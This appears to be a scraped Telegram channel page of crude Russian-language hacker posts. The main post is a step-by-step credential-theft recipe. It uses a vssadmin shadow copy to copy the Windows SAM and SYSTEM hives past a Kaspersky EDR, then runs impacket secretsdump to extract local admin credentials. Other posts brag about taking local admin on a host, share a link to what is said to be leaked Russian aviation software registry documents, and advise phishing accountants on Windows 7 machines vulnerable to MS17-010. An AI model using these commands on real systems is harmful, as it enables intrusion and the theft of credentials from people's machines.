xolodos.exe
الذهاب إلى القناة على Telegram
483
المشتركون
لا توجد بيانات24 ساعات
-17 أيام
+1530 أيام
أرشيف المشاركات
483
вчера эта залупень помогла снять локал админа но потом я хуйнул хост в сейф мод так шо он уже сутки висит
483
есть такая тема с shadov backup на виндовс, но ее можно немного потыкать и использовать в своих целях
к примеру, есть у нас тачка, и нам нужно спиздить SAM но ебучка на каспере EDR не дает даже снять lsass просто блокируя доступ, но креды хотя бы локал админа в любом случае нам нужны
что делать?
мы можем промутить такой движ
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\SAM.bak
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\SYSTEM.bak
и у нас в C:\ появится 2 файлика но ебать мой хуй а шо с ними делать?
пиздуем в калюху
impaket-secretsdump -sam SAM.bak -system SYSTEM.bak LOCAL
и у вас выргнет креды SAM
483
Repost from Cat Eyes OSINT
Дві частини
"Реестр специального программного обеспечения систем обработки полетной информации, допущенного к использованию в авиапредприятиях Российской Федерации".
https://fex.net/ru/s/cvemans
Багато компаній які розробляють та поставляють ПЗ
483
что бы двигать фиш, нада не иишку а понимать тупых бугалтерш 1с шоб они открывали твое гавно на своих windows 7 ms17-010
483
Интересный факт:
Первый шифровщик использовался как анкета для спида и требовал после шифрования 189$
